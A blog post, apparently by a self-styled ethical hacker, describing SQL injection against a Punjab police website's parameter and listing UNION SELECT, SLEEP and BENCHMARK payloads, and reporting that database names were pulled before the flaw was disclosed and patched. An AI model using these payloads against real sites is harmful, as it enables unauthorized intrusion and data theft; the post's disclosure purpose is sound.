How I Hacked Database of MOGA Police Services Punjab Web-Applicaton !!
Hello Wonderful Readers ,
I am Parshwa Bhavsar back with another blog where I have taken over the Whole DataBase of MOGA Police Services Punjab’s Web-Applicaton ethically and reported & Got acknowledgement for it.
As I mentioned in my previous blog that I was finding vulnerabilities in Govt. Websites to make sure the security level of Indian Cyber Space is High.
After rolling to some website , I have came to know about one website which is official website of MOGA Police Services. I have extracted all the parameters for testing XSS and SQL Injection Vulnerabilities.
I have found an interesting parameter called : /mart_det.php?id=2
I have tried basic payload “%27" to check whether it is vulnerable or not.
It was Vulnerable :)
I have tried following payloads :
UNION SELECT @@VERSION,SLEEP(5),3UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
After some other payloads and fuzzing , I was able to retrieve database names.
Obviously I can not reveal it due to security reasons.
I have immediately report it to Govt. of Indian and triggered after a day.
It is patched now and the previous data has been changed in safely manner.
Here is the 1 Screenshot of from that database for proof.
Here is the acknowledgement from Govt. of India.
I hope you liked it :)
Love Love !!!
